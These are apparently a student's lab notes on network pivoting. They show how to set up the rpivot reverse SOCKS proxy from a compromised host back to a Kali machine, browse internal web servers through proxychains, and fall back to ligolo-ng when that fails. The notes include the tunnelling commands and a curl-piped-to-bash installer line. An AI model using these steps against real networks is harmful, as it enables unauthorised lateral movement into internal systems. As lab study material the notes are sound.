9 - Web Server Pivoting with rpivot

# Introduction - `rpivot` is a reverse SOCKS proxy tool written in python for SOCKS tunneling - Essentially `rpivot` binds a machine inside an internal network to an external server and exposes the client's local port on the server-side ![[images/Pasted image 20251022193913.png]] # Using `rpivot` - Installing `rpivot` ```bash git clone https://github.com/klsecservices/rpivot.git ``` - Install `python2.7` ```bash sudp apt install -y python2.7 ``` - Alternative install for `python2.7` ```bash curl https://pyenv.run | bash echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc echo 'eval "$(pyenv init -)"' >> ~/.bashrc source ~/.bashrc pyenv install 2.7 pyenv shell 2.7 ``` - Move `rpivot` to pivot host and run `client.py` on pivot hsot ```bash scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/ cd rpivot python2.7 client.py --server-ip <kali_host_ip> --server-port 9999 ``` - Run `server.py` on Kali host ```bash python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 ``` - Confirm connection between Kali and pivot hosts![[images/Pasted image 20251022194610.png]] - Browse to downstream target webserver using `proxychains4` ```bash proxychains4 firefox-esr <internal_ip_target_webserver> ``` - Connect to downstream target webserver using HTTP-Proxy & NTLM authentication ```bash python client.py --server-ip <internal_ip_target_webserver> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password> ``` # Exercise ## Attempt A - Ping pivot host ![[images/Pasted image 20251022195148.png]] - Light nmap scan pivot host ![[images/Pasted image 20251022195155.png]] - Download `rpivot` ![[images/Pasted image 20251022195229.png]] - Move `rpivot` to pivot host with `scp` ![[images/Pasted image 20251022200027.png]]![[images/Pasted image 20251022200045.png]] - Execute `client.py` on pivot host ![[images/Pasted image 20251022201336.png]] - Execute `server.py` on Kali host![[images/Pasted image 20251022200208.png]] - Nmap scan webserver ports on downstream webserver target ![[images/Pasted image 20251022200355.png]] - Attempt to open page hosted by downstream webserver with `firefox-esr` browser ![[images/Pasted image 20251022201403.png]] - Lots of errors cannot see page in browser ## Attempt B - Let's try with `ligolo-ng` - Setup proxy on Kali host ![[images/Pasted image 20251022202001.png]] - Move agent to pivot host ![[images/Pasted image 20251022202022.png]]![[images/Pasted image 20251022202036.png]] - Setup agent on pivot host ![[images/Pasted image 20251022202058.png]] - Setup attach to session and autoroute on proxy ![[images/Pasted image 20251022202129.png]] - Confirm `ligolo-ng` interface and route ![[images/Pasted image 20251022202204.png]] - Confirm we can hit downstream webserver with `nmap` scan and `ping` ![[images/Pasted image 20251022202223.png]] - Attempt to open page hosted by downstream webserver with `firefox-esr` browser ![[images/Pasted image 20251022202447.png]] ![[images/Pasted image 20251022202343.png]] - That works! - Thanks `ligolo-ng`